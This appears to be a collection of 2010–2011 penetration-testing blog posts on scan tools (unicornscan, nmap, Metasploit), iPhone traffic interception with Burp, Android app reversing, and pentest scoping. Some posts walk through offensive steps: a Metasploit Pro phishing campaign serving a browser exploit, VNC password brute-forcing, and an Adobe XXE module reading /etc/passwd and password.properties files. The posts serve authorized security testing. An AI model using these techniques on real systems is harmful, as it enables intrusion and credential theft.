**This is assuming that the company's maturity level supports doing a phishing exercise. If your internal security just plain sucks, then you could probably win the argument that no phishing should be conducted but I would counter with why are you getting a Pentest in the first place if things are that bad. Use those consulting dollars to have the consultant help you with your risk plan, internal vulnerability scanning/patching program, workstation/server hardening or teaching you how to scan your internal assets yourself. To steal a Nickerson analogy..."how do you know you can put up a fight if you cant take punch" BUT that doesnt mean you start out getting your ass kicked by starting training with [INSERT MMA BADASS HERE] instead of working your way up.

Training Like You Fight

2011-01-24T09:02:00.002-05:00

One of my favorite talks from this year's BlackHat DC was Ryan Kazanciyan's & Sean Coyne's "The Getaway" talk on data exfiltration.

whitepaper:
https://media.blackhat.com/bh-dc-11/Coyne/BlackHat_DC_2011_Coyne_Gateway-wp.pdf
slides:
https://media.blackhat.com/bh-dc-11/Coyne/BlackHat_DC_2011_Coyne_Gateway-Slides.pdf

Everyone should check out the slides and the whitepaper although the slides are better with the case studies and the diagrams. When you check out the slides I encourage you to think about your last pentest and:
1. could your pentest shop emulate an attacker of the level in the case studies.
2. did you or they try to scope the test in order to test things like this...aka do a Full Scope test.
3. if you aren't letting your pentesters go after your network like this how do you think YOUR network will hold up against someone that knows what they are doing?

If you ARE a pentester when was the last time you got the time and scope to do something on the order of these attacks and post exploitation activities from the case studies?

We are getting great at catching our penetration testers (video) but still horrible at catching bad guys. Rather than draining your corporate bank account to have some shop come in and help you clean up your mess and you've discovered someone stealing everything you own... 1. pick a Full Scope shop that can emulate advanced attackers and not just script kiddies with a checkbook and 2. train like you fight, open the scope for your test, give your testers time to conduct a REAL test, and let your pentesters go after it like a real bad guy would.

Instead of making your testers "test' that same 500 hosts out of 10,000 hosts with no client-sides or user interaction allowed...ask, make, force, them to conduct an end-to-end test of the expensive black boxes you have sitting in the rack, your user education, your network segmentation, and your NOC/SOC's ability to test and respond to attacks. Better to find out you suck during your test instead of when someone is stealing everything that makes you money.

Train like you fight.

Installing Unicornscan on a current Ubuntu Distro

2011-01-09T11:37:00.012-05:00

So get unicornscan from here :

http://unicornscan.org/ -- current version I could find is 0.4.7

you'll need some depenedencies

apt-get install flex bison

apt-get install libpcap0.8-dev libgeoip-dev libltdl3-dev libdumbnet1 libdumbnet-dev

* you may need texlive-extra-utils if you are on a headless system like slicehost or linode, otherwise it will bomb out when it tries to make the documentation :-(

apt-get install texlive-extra-utils

Fix up weird lib issues see at the bottom for where i got this:

blah@blah:$ sudo ln -s /usr/include/dumbnet.h /usr/include/dnet.h

blah@blah:$ for i in `find ./ -type f -exec grep -l 'ldnet' '{}' \;`; do sed -i bak -e 's/ldnet/ldumbnet/g' $i; done

apply this patch

https://www.pentoo.ch/pentoo/browser/portage/trunk/net-analyzer/unicornscan/files/unicornscan-0.4.7-configure.patch

./configure CFLAGS=-D_GNU_SOURCE
make
make install

after that it woud compile and run.

I did have to really crank down the pps to get it to actually run, default is 300 i had to use around 75-100

sudo unicornscan -m U -Ir 75 --show-errors -v externalrange.net/24

Lets test ...

host #1

sudo unicornscan -m U -Ir 75 -v 192.168.1.143

adding 192.168.1.143/32 mode `UDPscan' ports `7,9,11,13,17,19,20,37,39,42,49,52-54,65-71,81,111,161,123,136-170,514-518,630,631,636-640,650,653,921,1023-1030,1900,2048-2050,27900,27960,32767-32780,32831' pps 75
using interface(s) eth0

UDP open domain[ 53] from 192.168.1.143 ttl 50
UDP open netbios-ns[ 137] from 192.168.1.143 ttl 50
UDP open unknown[51468] from 192.168.1.143 ttl 50

msf auxiliary(udp_sweep) > run

[*] Sending 10 probes to 192.168.1.143->192.168.1.143 (1 hosts)
[*] Discovered NTP on 192.168.1.143:123 (NTP v4)
[*] Discovered NetBIOS on 192.168.1.143:137 (INEEDAFW01:<00>:U :INEEDAFW01:<03>:U :INEEDAFW01:<20>:U :__MSBROWSE__:<01>:G :WORKGROUP:<1d>:U :WORKGROUP:<1e>:G :WORKGROUP:<00>:G :00:00:00:00:00:00)
[*] Discovered DNS on 192.168.1.143:53 (BIND 9.4.2-P2)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sudo nmap -sU 192.168.1.143
PORT STATE SERVICE
53/udp open domain
69/udp openfiltered tftp
123/udp open ntp
137/udp open netbios-ns
138/udp openfiltered netbios-dgm

*took approx 13 min for results

Host #2

sudo unicornscan -m U -Ir 75 -v 192.168.1.94
UDP open sunrpc[ 111] from 192.168.1.94 ttl 50
UDP open shilp[ 2049] from 192.168.1.94 ttl 50

msf auxiliary(udp_sweep) > run

[*] Sending 10 probes to 192.168.1.94->192.168.1.94 (1 hosts)
[*] Discovered Portmap on 192.168.1.94:111 (100000 v2 TCP(111), 100000 v2 UDP(111), 100024 v1 UDP(35483), 100024 v1 TCP(34855), 100003 v2 UDP(2049), 100003 v3 UDP(2049), 100003 v4 UDP(2049), 100021 v1 UDP(51021), 100021 v3 UDP(51021), 100021 v4 UDP(51021), 100003 v2 TCP(2049), 100003 v3 TCP(2049), 100003 v4 TCP(2049), 100021 v1 TCP(32771), 100021 v3 TCP(32771), 100021 v4 TCP(32771), 100005 v1 UDP(54730), 100005 v1 TCP(50729), 100005 v2 UDP(54730), 100005 v2 TCP(50729), 100005 v3 UDP(54730), 100005 v3 TCP(50729))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sudo nmap -sU 192.168.1.94 -v
PORT STATE SERVICE
111/udp open rpcbind
639/udp openfiltered unknown
2049/udp open nfs

*took approx 14 min

Quick notes:
unicornscan sucks for NTP, the metasploit udp_sweep is better even though the port is in the scan list it fails to locate NTP servers

you'll probably want to add some port to the /usr/local/etc/unicornscan/unicorn.conf file in the UDP section, namely 1434,1604,5093,& 523 to be consistent for what metasploit is sending probes for.

you may also want to update the ports list in the above folder to be les stupid as well.

In this case nmap gave consistent results, just took forever

compile stuff from here:
http://itbloggen.se/cs/blogs/olle_lindgren/archive/2009/01/08/unicornscan-on-ubuntu-8-10-intrepid-ibex.aspx?CommentPosted=true#commentmessage

http://geek00l.blogspot.com/2009/01/ubuntu-unicornscan-revisit.html

SOAP functionality added to wXf

2011-01-04T12:06:00.000-05:00

We've pre-packaged SOAP libs and wrappers in wXf and created a couple modules to demonstrate this functionality. The framework is undergoing beta testing and improvements before release. Also, we are adding a couple web specific libs prior to release (or at least trying).

Anyway, here is a video that demos the two modules mentioned above.

wXf - WSDL File Enumeration, SOAP Request from cktricky on Vimeo.

Metasploit and VNC Password Bruteforcing

2010-12-17T15:24:00.007-05:00

You probably missed it but jduck recently snuck in a VNC mixin and vnc_login module to the trunk.

This is awesome because before that I had to use Immunity's VAAseline to do VNC bruteforcing. But now you can just use vnc_login.

So the scenario is you find yourself on the other end of a VNC server.

Its tedious to password guess like this

Instead let's use the metasploit module

and throw a dictionary attack against the VNC server

Looks like the VNC no auth module had been ported and stuck in there too :-)

-CG

Conducting a Phishing Campaign in Metasploit Pro

2010-12-16T17:56:00.018-05:00

So new job gets me new fun toys. Figured i'd try the fancy shmancy tools and do a phish campaign with metasploit pro.

1. Go click on campaigns and star filling stuff out like what you want to call it

2. Set up your web campaign. With the web campaign you can actually host a webpage along with your exploit instead of just getting the typical "please wait" stuff.

3. Fill out your name of the template and the html of what you want it to say

4. By default it will run browser autopwn

5. Lets just pick an exploit to throw at them instead of all of them

6. Once you click save, it should look something like this:

7. After that you can set up the email portion of the phish

8. Fill out the sending server options

9. Then fill out the text for the body of your email

10. After you click save, you'll go to the add email addresses section where you can import a list, or type them in

11. Kinda looks like this when its all filled out. To start click the start campaign button

12. You can see the status of your sent emails and as people click them the percentage will change

13. I guess what the email could look like if you werent trying too hard :-)

14. And the web page serving up the exploit

15. You can now see that a user clicked the link and our percentage has changed

I'll cover hosts and sessions later. Only gripe is the lack of configuration ability in the exploit payload section. I've been told this will be addressed shortly even though a lot of work has been put into smart defaults the ability to change it when necessary would be nice.

-CG

iPhone + Burp

2010-11-23T11:05:00.000-05:00

This is one of those things that is super simple and I figure most folks have already done or know how to do. There may be a few people out there whose time I save with this post. Who knows. Lets get on with it.

Just as with the Droid apps, when an untrusted certificate (Burp) shows up for an app requiring SSL/TLS, the app crashes and burns. The best way (same as Droid) to fix this is to import Burp as a trusted Certificate Authority (CA).

Why would we want to do this? Apps on mobile phones are cool but some would argue the web-services the apps are communicating with can be even juicier. We'd like to intercept the communication to the web-services and play around a bit.

You'll need to export the Burp Certificate, I usually open Firefox, set the browser to run thru Burp, view the certificate, export the certificate. Much like this.........

Browse to https://twitter.com (while proxying thru Burp)

"Get Certificate"

Select PortSwigger's cert

Save Certificate with a .cer extension (.cer is what the iPhone recognizes)

Start a web server to host the PortSwiggerCA.cer

Browse to the location of the PortSwigger.cer file

The iPhone detects .cer, asks you to install as a CA, do it :-)

WiFi configuration, click the blue arrow on the right of your network

Configure with Burp's IP & Proxy

Hopefully that was easy enough to follow along. Now you can proxy your iPhone apps thru Burp.

~Happy Hacking

wXf Videos from AppSec DC 2010

2010-11-22T20:42:00.000-05:00

Here are some of the videos from AppSec DC 2010 and our presentation (Seth Law, Chris Gates and I) on wXf (Web Exploitation Framework).

Background: Back in March of this year, Seth approached me with the idea of creating a framework that would allow us to put all of our discontiguous scripts together. Then we decided "our" could mean the AppSec community as a whole. Why not take everyone's one-off scripts, proof-of-concept tools and ideas and centralize them? So........we've worked off and on since March to build it.

The only frameworks available to us at the time (and even now) which were "WEB-centric" had user interfaces that weren't what we were looking for, broke after updates and/or randomly OR just didn't have the HTTP libs we needed (SOAP, JSON, Flex, etc).

So the first thing we focused on was the console interface. We figure this will probably be the interface with the most mileage. At the moment, we are still working on the console interface as well as improving the core. The framework won't be perfect from day one but we'd like to make it as easy to use as possible.

We decided Metasploit is possibly the best designed piece of open source software/framework that we've seen and it works incredibly well. People are familiar with it and it looks nice. So we decided to make wXfconsole look like msfconsole. Same *general* type of commands and interface layout.

Release will occur in the next couple of months. We have a list of people to "beta-test" the software and want to ensure we limit the amount of bugs to a minimum upon release.

Now, for the videos.

User Agent Fuzzer by Chris Gates (carnal0wnage) from cktricky on Vimeo.

wXf Directory Traversal Fuzzer by Chris Gates (carnal0wnage) from cktricky on Vimeo.

wXf Web Server Stack by Seth Law from cktricky on Vimeo.

Tethering Your Droid to a Linux System

2010-11-08T09:54:00.001-05:00

Image my happiness with i got the droid update and saw usb tethering available.

Then image my sadness-->rage that VendorX wants to charge to charge another 15 bucks to tether.

so following the instructions from here it is possible to tether via USB on linux. Evidently PDAnet works great but i dont use windows cept for powerpoint and i cant afford a mac.

so here's how to get it going if you dont want to click the link...plus i'll never remember that URL.

install proxoid on your droid

download & extract the android sdk to your linux system

turn on android usb debugging -->application-->development-->usb debugging

turn on proxoid

connect usb

cg@c0:~$ cd android-sdk-linux_86/tools/

cg@c0:~/android-sdk-linux_86/tools$ sudo ./adb start-server

cg@c0t:~/android-sdk-linux_86/tools$ ./adb forward tcp:8080 tcp:8080

set your FireFox network settings to use localhost 8080 and you can surf. You should also be able to set your whole system to go thru the droid as well if you set the system wide network proxy.

Adobe XML Injection Metasploit Module

2010-11-06T08:57:00.016-04:00

I just pushed out code coverage for the Adobe XML External Entity Injection vulnerability in multiple adobe products including: BlazeDS 3.2 and earlier versions, LiveCycle 9.0, 8.2.1, and
8.0.1, LiveCycle Data Services 3.0, 2.6.1, and 2.5.1, Flex Data
Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2

References Here:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3960
http://www.osvdb.org/62292
http://www.securityfocus.com/bid/38197
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
http://www.adobe.com/support/security/bulletins/apsb10-05.html

I recommend you read security-asessment's pdf on it, its good.

Anyway, its a cool bug.
1 -->because it affects several products although most people have probably never heard of most of them except for ColdFusion.
2 -->its enabled by default on all those products you've never heard of except for ColdFusion, with the exception of CF 8 which appears to have it turned on by default.
3 -->You have to apply patches for CF individually and there is no automated process. Since this vuln got little media attention I've seen alot of hosts that are still missing this patch and/or didn't turn off the vuln service.

On with the demo!

So against a patched host or someone that has disabled the service in ColdFusion you'll see one of two things; either 404's for the checks or 200 for /flex2gateway/ and 500 for the http or https check.

If you get a bunch of 400's then you need to set the VHOST

When it works, you'll see something like this for /etc/passwd

and like this when you asked for a file that doesn't exist or doesn't have permission to read (since CF doesn't run as root on linux, requesting /etc/shadow wont work) :-(

At this point, you're probably like "so what" well whats cool about arbitrary file read is that 1. it also works on Windows:

and 2. that whole password.properties attack is now cool again because you can just request that file too

-CG

A new definition of "win"

2010-10-08T09:03:00.003-04:00

Ben Tomhave has a good post over on his blog

http://www.secureconsulting.net/2010/10/there_is_no_win.html

go read it. its short...wont take long, I promise.

In part I agree, you are never going to "win" by keeping an attacker out. Like he puts in the post:

Traditionally we've held the mindset that we "win" if we stop the attackers. This mindset is sheer folly. To "win" in this scenario we need to successfully defend against 100% of attacks, whereas the attacker need only succeed once (probabilistically this works out to being far less than 100%).

Instead, we need to acknowledge the nature of our asymmetric threat and realize that there is no way to achieve "perfect" security and resist 100% of attacks. To think otherwise is willfully ignorant. Instead, we must accept a new status quo based on survivability. That is, despite successful attacks, we can consider ourselves victorious in conflict merely by surviving.

Protecting YOUR important data on the network is ultimately the goal of most network security. Keeping the attackers out is a silly goal. You are one adobe/flash/java/whatever 0day away from failing to keep attackers out and thus "losing".

Surviving a network attack is not the same as surviving a mortar attack on a FOB where if I'm still breathing and have use of my limbs at the end of it i can call that a "win". In turn, its not a successful penetration test or attack if merely "get in" and pop a bunch of shells (see Chris Nickerson's Top 5 Ways To Destroy A Company talk). Its a "win" when I steal what makes that company money, extract it without them knowing, then show it to them later for the "poop in the pants" moment. A report with a bunch of screenies of shells doesn't convey the same sense of "oh shit" that the first 100 entries of their key database does. In this case while the business may have thought they "survived" they in fact "lost".

We're getting really good at teaching our clients how to catch penetration testers and their methodologies and conditioning them that this a "win" when in fact most times defenders fail to see and catch people with a modified methodology, non public tools, or "non-standard" goals.

Hacking: The Next Generation Book Review

2010-09-27T10:37:00.000-04:00

Hacking: The Next Generation Book Review

Nitesh Dhanjani, Billy Rios, & Brett Hardin

5 stars

Good Intro to Next Gen Attacks

First Impressions...skinny book. Strike One. Chapter 1 -- "Intelligence Gathering: Peering Through the Windows to Your Organization" spends a lot of time on physical security and social engineering and no mention of Maltego. I'm not sure how anyone can write a book on Intelligence Gathering and NOT include Maltego. Strike Two.

At this point i was thinking I had a dud on my hands BUT Chapter 2 --- "Inside-Out Attacks: The Attacker Is the Insider" redeems. Tons of code and examples to make XSS work in "realistic" scenarios mix the right amount of tech and narrative. My only gripe was that they talked about using XSS shell for XSS exploitation instead of using BEeF which is actively maintained and developed.

All the other chapters (except for Chapter 3) were very good, none of the others are as technical as chapter 2 but I believe they cover the current trends in a entertaining and readable way. Like one reviewer mentioned the information covered in Chapter 5 -- "Cloud Insecurity: Sharing the Cloud with Your Enemy" was not what I expected. It covered high level "possible" attacks versus any "probable" attacks. With the exception of possibly making insecure VM's and getting people to run it. Chapter 7 -- "Infiltrating the Phishing Underground: Learning from Online Criminals?" was a "chapterfied" version of the authors talk on the subject. Chapter 4 -- "Blended Threats: When Applications Exploit Each Other" was a good overview of stringing vulnerabilities that would be/were not considered high risk into high risk issues by combining one or more together which actually is "next generation".

Chapter 3, IMO didnt cover anything new. Mostly a discussion of insecure protocols, arp spoofing, email spoofing. While still a relevant issue in security not "next generation".

AppSec DC 2010 and Web Exploitation Framework

2010-09-23T14:07:00.000-04:00

Back in March, I spoke of inactivity on this blog because of time being devoted to a new tool.

The post can be found Here :

The tool is actually a combination of tools or Web Exploitation Framework (wXf). The idea is to roll the massive amounts of various AppSec tools into a single framework. Simplifies things, we hope.

Come November 10th, at AppSec DC 2010 we will be presenting the framework and laying out a road-map. I hope it becomes useful to consultants and application security practitioners.

More info can be found at the following link (full schedule):

OWASP FULL SCHEDULE

...and here (wXf Specific):

WXF PRESENTATION

Look forward to seeing you all there.

~Happy Hacking

cktricky

Grabbing Index Pages Of Webservers

2010-09-04T19:47:00.007-04:00

Grabbing the index pages of web servers seems like a no brainer and something every pentester is going to perform on a test. The problem I ran into is how do you get this info once your inside and using meterpreter as your pivot into the network.

Your current options are to port forward to each host or set up a route via your meterpreter session and run some sort of auxiliary module. You can tcp port scan and find open ports or use the http_version module to see server version but you don't get a feel for whats actually on the site.

I opted to write something that would scan a range, perform a HTTP GET of / on the ip, then take the resulting body from the response, which should be html, and save it to a file to look at afterwards.

Looks like this when it runs...

msf auxiliary(http_index_grabber) > set RHOSTS carnal0wnage.com/24
RHOSTS => carnal0wnage.com/24
msf auxiliary(http_index_grabber) > run
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.4_20100904.4426.html
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.5_20100904.4429.html
[*] Received 301 to http://drumsti.cc/ for 209.20.85.10:80/
[-] Received 403 for 209.20.85.8:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.12_20100904.4432.html
...
[*] Received 302 to http://209.20.85.57/apache2-default/ for 209.20.85.57:80/ [+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.56_20100904.4503.html
[*] Received 302 to http://209.20.85.51/session/new for 209.20.85.51:80/

you can then check out the folder with the results

code is here:
http://carnal0wnage.googlecode.com/svn/trunk/msf3/modules/auxiliary/admin/random/http_index_grabber.rb

Scanning IPv6 Enabled Hosts

2010-08-02T10:35:00.000-04:00

Nmap will scan IPv6 enabled hosts if you pass it the -6 switch, but only does TCP Connect scans and no OS identification, which makes sense because OS identification uses nuances of ipv4 responses...

carnal0wnage ~: nmap -6 -sV 2002:53e9:a52a::832:3316:5042 -p53,80,222

Starting Nmap 5.21 ( http://nmap.org ) at 2010-03-19 20:42 UTC
Nmap scan report for 2002:53e9:a52a::832:3316:5042
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.X
80/tcp open http nginx
222/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
Service Info: OS: Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.92 seconds

carnal0wnage ~: nmap -6 -sV ::ffff:66.148.86.4

Starting Nmap 5.21 ( http://nmap.org ) at 2010-03-19 21:00 UTC
Nmap scan report for ::ffff:66.148.86.4
Host is up (0.024s latency).
Not shown: 795 closed ports, 203 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.9)
8080/tcp open http-proxy Squid webproxy 2.6.STABLE16

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.41 seconds

and metasploit supports ipv6

msf auxiliary(http_version) > run

[*] 2002:53e9:a52a:0000:0000:0832:3316:5042 is running nginx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Scapy, Traceroute and Pretty Pictures

2010-07-28T09:03:00.001-04:00

much much more available in the documentation
http://www.secdev.org/projects/scapy/doc/usage.html

but here is how to make a cool traceroute graph from you to another host.

from: http://www.secdev.org/projects/scapy/doc/usage.html#tcp-traceroute-2

Welcome to Scapy (v1.1.1 / -)
>>> res, unans = traceroute("www.google.com",dport=80,maxttl=20)
Begin emission:
*****************Finished to send 20 packets.
*
Received 18 packets, got 18 answers, remaining 2 packets
209.85.225.103:tcp80
1 209.20.72.2 11
2 209.20.79.6 11
3 4.53.160.189 11
4 4.69.132.186 11
5 4.69.132.190 11
6 4.68.101.34 11
7 4.79.208.18 11
8 209.85.254.130 11
9 72.14.232.141 11
10 209.85.241.35 11
11 66.249.95.138 11
14 209.85.225.103 SA
15 209.85.225.103 SA
16 209.85.225.103 SA
17 209.85.225.103 SA
18 209.85.225.103 SA
19 209.85.225.103 SA
20 209.85.225.103 SA
>>> res.graph(target="> /tmp/graph.svg")
>>>

opening up /tmp/graph.svg will give you:

Reversing Android Apps

2010-07-26T10:07:00.001-04:00

thanks to cktricky for pointing me to:

android-apktool

Once you've gotten it installed/unzipped its fairly easy to use. Download your .apk from the emulator.

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb pull /data/app/com.joelapenna.foursquared.apk com.joelapenna.foursquared.apk 2441 KB/s (625416 bytes in 0.250s)

From there simply decode the .apk

user@dev:~/android-tutorial/reverse$ ./apktool d com.joelapenna.foursquared.apk foursquare
I: Baksmaling...
I: Loading resource table...
I: Decoding resources...
I: Loading resource table from file: /home/user/apktool/framework/1.apk
I: Copying assets and libs...

From there you should have a folder looking something like this

inside your smali folder will be all the decompiled java. have fun.

actually after i did the above, I found this which is a video covering the above and previous posts.

Using the Android Debug Bridge (adb)

2010-07-23T10:40:00.003-04:00

The android debug bridge (adb) has lots of useful features. its documented here:
http://developer.android.com/guide/developing/tools/adb.html

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb
Android Debug Bridge version 1.0.25

some of the features you may want to immediately mess with are:

listing devices

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb devices
* daemon not running. starting it now *
* daemon started successfully *
List of devices attached
emulator-5554 device

getting an interactive shell on the emulator

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb shell
# ls
sqlite_stmt_journals
cache
sdcard
etc
system
sys
sbin
proc
init.rc
init.goldfish.rc
init
default.prop
data
root
dev

cat'ing useful stuff inside that shell

# cat /proc/cpuinfo
Processor : ARM926EJ-S rev 5 (v5l)
BogoMIPS : 233.47
Features : swp half thumb fastmult vfp edsp java
CPU implementer : 0x41
CPU architecture: 5TEJ
CPU variant : 0x0
CPU part : 0x926
CPU revision : 5
Cache type : write-through
Cache clean : not required
Cache lockdown : not supported
Cache format : Harvard
I size : 4096
I assoc : 4
I line length : 32
I sets : 32
D size : 65536
D assoc : 4
D line length : 32
D sets : 512

Hardware : Goldfish
Revision : 0000
Serial : 0000000000000000

and probably pulling things off the file system so you can reverse them.

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb pull /data/app/com.joelapenna.foursquared.apk com.joelapenna.foursquared.apk
2441 KB/s (625416 bytes in 0.250s)